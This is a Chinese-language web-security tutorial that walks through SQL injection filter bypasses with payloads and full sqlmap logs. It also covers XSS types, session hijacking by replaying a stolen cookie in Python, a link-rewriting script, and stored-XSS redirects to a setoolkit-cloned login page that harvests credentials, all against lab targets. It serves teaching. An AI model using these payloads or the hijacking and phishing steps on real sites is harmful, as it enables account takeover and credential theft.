一、绕过SQL注入
1.绕过去除注释符的SQL注入
注释符的作用:
用于标记某段代码的作用,起到对代码功能的说明作用,但是注释掉的内容不会被执行。
Mysql中的注释符:
- 单行注释
--+或--空格或# - 多行注释
/* 多行注释内容 */
正常的SQL语句中,注释符起到说明作用的功能;
但是对于在利用SQL注入漏洞过程中,注释符起到闭合单引号、多单引号、双引号、单括号、多括号的功能。
利用注释符过滤不能成功闭合单引号时,换一种思路,利用or ‘1’ = '1形式的语句来闭合。
SQL中测试:
select * from users where id = '1' or '1' = '1';
打印
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
+----+----------+------------+
8 rows in set (0.00 sec)
访问http://127.0.0.1/sqli-labs/Less-23/?id=1’ or ‘1’='1,显示:
显然,此时未报错,可以正常访问。
2.绕过剔除and和or的SQL注入
MySQL基础知识:
- MySQL中的大小写不敏感,大写与小写一样
- MySQL中的十六进制与URL编码
- 符号和关键字替换
and替换为**&&**,or替换为 ||。
访问http://127.0.0.1/sqli-labs/Less-25/?id=1’ or ‘1’='1,提示错误信息(输入被过滤):
可以用符号替换or和and,例如:
select * from users where id = '1' || '1' = '1';
打印
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
+----+----------+------------+
8 rows in set (0.00 sec)
用||和or的效果一样。
再次测试:
select * from users where username = 'admin' && password = 'admin';
打印
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 8 | admin | admin |
+----+----------+----------+
1 row in set (0.00 sec)
在进行注入测试时,访问http://127.0.0.1/sqli-labs/Less-25/?id=1’ or ‘1’='1可能会屏蔽掉or,而成了http://127.0.0.1/sqli-labs/Less-25/?id=1’ ‘1’='1,此时成了在数据库中查找id为11的记录。
访问http://127.0.0.1/sqli-labs/Less-25/?id=1’ || ‘1’='1,显示:
sqlmap安全测试
python sqlmap.py -u 127.0.0.1/sqli-labs/Less-25/?id=1 --dbs --batch
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:56:04 /2020-03-12/
[19:56:05] [INFO] testing connection to the target URL
[19:56:07] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:56:09] [INFO] testing if the target URL content is stable
[19:56:11] [INFO] target URL content is stable
[19:56:11] [INFO] testing if GET parameter 'id' is dynamic
[19:56:13] [INFO] GET parameter 'id' appears to be dynamic
[19:56:15] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:56:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:56:17] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[19:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:56:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:56:46] [WARNING] reflective value(s) found and filtering out
[19:56:48] [INFO] testing 'Generic inline queries'
[19:56:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:58:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:00:11] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:01:57] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:02:52] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --strin
g="Login")
[20:02:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:02:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:02:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:02:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:03:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:03:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:03:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:03:06] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:03:08] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:03:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:03:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:03:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:03:16] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:03:18] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[20:03:20] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:03:22] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:03:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:03:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:03:24] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:03:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:03:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:03:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:03:24] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[20:03:26] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[20:03:28] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[20:03:30] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:03:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[20:03:34] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[20:03:36] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:03:38] [INFO] testing 'MySQL inline queries'
[20:03:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:03:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:03:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:03:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:03:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:03:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:03:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:03:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[20:03:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[20:03:59] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[20:04:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[20:04:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[20:04:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:04:07] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[20:04:09] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:04:11] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[20:04:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[20:04:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[20:04:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:05:19] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
[20:05:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:05:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:05:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:06:02] [INFO] target URL appears to be UNION injectable with 3 columns
[20:06:16] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (3231=3231) THEN 1 ELSE 0x28 END))-- JwBt
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=1' RLIKE SLEEP(5)-- TZbF
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-6337' UNION ALL SELECT NULL,CONCAT(0x7178767871,0x635a545a4877775a7649456c7a576d4d4679465050687049475a41766e536161616375704570704c,0x716b
717871),NULL#
---
[20:06:18] [INFO] the back-end DBMS is MySQL
[20:06:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0.12
[20:06:28] [INFO] fetching database names
[20:06:30] [WARNING] the SQL query provided does not return any output
[20:06:30] [INFO] fetching number of databases
[20:06:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:06:30] [INFO] retrieved:
[20:06:36] [INFO] retrieved:
[20:06:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[20:06:42] [ERROR] unable to retrieve the number of databases
[20:06:42] [INFO] falling back to current database
[20:06:42] [INFO] fetching current database
available databases [1]:
[*] security
[20:06:44] [INFO] fetched data logged to text files under 'XXXX\sqlmap\output\127.0.0.1'
[*] ending @ 20:06:44 /2020-03-12/
3.绕过去除空格的SQL注入
编码:
hex,urlencode等。
| 符号 | URL编码 |
|---|---|
| 空格 | %20 |
| TAB | %09 |
更多URL编码可查看https://www.w3school.com.cn/tags/html_ref_urlencode.html。
访问http://127.0.0.1/sqli-labs/Less-26/?id=1’ --+,显示:
显然,此时未正常访问。
sqlmap安全测试
python sqlmap.py -u 127.0.0.1/sqli-labs/Less-26/?id=1 --hex --dbms=mysql --batch
打印
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:05:31 /2020-03-12/
[20:05:32] [INFO] testing connection to the target URL
[20:05:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:05:36] [INFO] testing if the target URL content is stable
[20:05:38] [INFO] target URL content is stable
[20:05:38] [INFO] testing if GET parameter 'id' is dynamic
[20:05:40] [INFO] GET parameter 'id' appears to be dynamic
[20:05:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:05:44] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:05:44] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:05:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:06:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:06:10] [INFO] testing 'Generic inline queries'
[20:06:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:08:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:08:06] [WARNING] reflective value(s) found and filtering out
[20:09:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:11:33] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:13:59] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:16:54] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:20:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:23:18] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:26:29] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:29:46] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:31:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:31:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:31:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:31:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:31:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:31:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:31:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:31:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:31:58] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:31:58] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:31:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:33:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:33:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:35:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:37:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:38:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:40:42] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:42:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:44:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:45:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:47:45] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:49:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:51:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:53:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:54:47] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:56:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:58:18] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:59:07] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:00:20] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:00:22] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:00:24] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:00:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:00:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:00:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:00:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:00:37] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:00:41] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:00:45] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:00:49] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:00:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:00:57] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:01:01] [INFO] testing 'MySQL inline queries'
[10:01:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:01:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:03:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:03:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:05:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:06:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:07:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:09:09] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:10:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:12:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:14:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:15:20] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:16:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:17:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:18:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:20:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:22:07] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:23:16] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:24:25] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:26:05] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:27:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:28:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:29:59] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:31:45] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:33:24] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:34:31] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:35:38] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:36:51] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:37:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:37:36] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:37:38] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:37:40] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:37:42] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:37:44] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:37:46] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:37:50] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:37:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:38:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:40:08] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:42:06] [WARNING] GET parameter 'id' does not seem to be injectable
[10:42:06] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 10:42:06 /2020-03-13/
说明:
有时候字符编码的问题,可能导致数据丢失,可以使用hex参数来避免。
二、XSS跨站脚本
1.XSS漏洞介绍
跨站脚本攻击(Cross Site Scripting):
为了不和层叠样式表(Cascading Style Sheets)的缩写混淆,故将跨站脚本攻击缩写为XSS。
恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的。
攻击的简单过程如下:
2.cookie介绍
cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。cookie是由web服务器保存在用户浏览器(客户端)上的小文本文件,它包含有关用户的信息。
Cookie的工作原理:
由于HTTP是一种无状态的协议,服务器单从网络连接上无从知道客户身份。怎么办呢?就给客户端们颁发一个通行证吧,每人一个,无论谁访问都必须携带自己通行证。这样服务器就能从通行证上确认客户身份了。
3.XSS分类
反射型XSS
反射型XSS又称非持久性XSS,这种攻击往往具有一次性。
攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有XSS的代码发送给用户,用户浏览器解析执行代码,触发XSS漏洞。
反射型测试:
显然,可以很容易地得到cookie。
存储型XSS
存储型XSS又称持久型XSS,攻击脚本存储在目标服务器的数据库中,具有更强的隐蔽性。
攻击者在论坛、博客、留言板中,发帖的过程中嵌入XSS攻击代码,帖子被目标服务器存储在数据库中,当用户进行正常访问时,触发XSS代码。
存储型测试:
DOM型XSS
DOM型XSS(DOM全称Document Object Model),使用DOM动态访问更新文档的内容、结构及样式。
服务器响应不会处理攻击者脚本,而是用户浏览器处理这个响应时,DOM对象就会处理XSS代码,触发XSS漏洞。
DOM型测试:
4.通过Python利用cookie会话劫持
将得到的cookie加入请求头,用Python模拟访问:
import requests
headers = {
'Cookie':'security=low; PHPSESSID=a3j2dd4aagnki7t47s2m2gjel3'
}
url = 'http://127.0.0.1/dvwa/index.php'
html = requests.get(url, headers = headers).text
with open('dvwa.html','w') as f:
f.write(html)
用浏览器打开得到的HTML文件,会看到:
显然得到了主要的数据,只是没有样式,如果不加cookie是得不到的。
劫持会话后可以进行的操作:
- 获取页面数据
- 劫持前端逻辑
- 发送请求
- 偷取用户资料
- 偷取用户密码和登录状态
三、XSS篡改网页链接和盗取用户信息
1.XSS篡改网页链接
下列JS代码可以修改网页的链接:
<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href = "http://www.baidu.com";
}
}
</script>
测试如下:
XSS distortlink test
显然,所有的友情链接都被篡改,改成了攻击者希望访问的链。
有许多微博或博客刷流量可能就是运用了该原理。
使用beef-xss生成恶意链接
示例如下:
XSS beef-xss test
2.XSS盗取用户信息原理
克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储。
简单原理如下:
setoolkit工具克隆网站
过程如下:
-
在kali终端中输入setoolkit
- 社会工程攻击>1
- 网站攻击>2
- 凭据收集攻击>3
- root网站克隆>2
-
存储XSS跳转克隆网站
-
在DVWA中XSS(Stored)中执行
<script>window.location = "http://192.168.xxx.xxx/";</script>
setoolkit工具进行克隆示例如下:
XSS setoolkit test
四、XSS攻击
1.实验环境介绍
地址:
https://xss-quiz.int21h.jp/
网页如下:
2.探测XSS过程:
- 构造一个不会被识别为恶意代码的字符串提交到页面中
- 使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示
3.闭合文本标签利用XSS
原理是闭合标签。
简单的payload
示例如下:
<script>alert(document.domain);</script>
闭合标签的payload
示例如下:
"</b><script>alert(document.domain);</script>
对简单的payload和闭合标签的payload进行测试如下:
4.配置Chrome关闭XSS-Auditor
在访问https://xss-quiz.int21h.jp/进行测试时可能会出现下图情况:
解决办法:
Chrome配置--args --disable-xss-auditor,具体如下:
在桌面重新新建一个Chrome的快捷方式,右键点击属性,设置目标,后加参数--args --disable-xss-auditor,确定保存,如下:
5.属性中的XSS发现
技巧:
ctrl+f全局搜索内容;
闭合引号,尖括号,引入script脚本,例如:
123"><script>alert(document.domain);</script>
onmouseover事件指定鼠标悬停弹出,例如:
" onmouseover=alert(document.domain)>
测试如下:
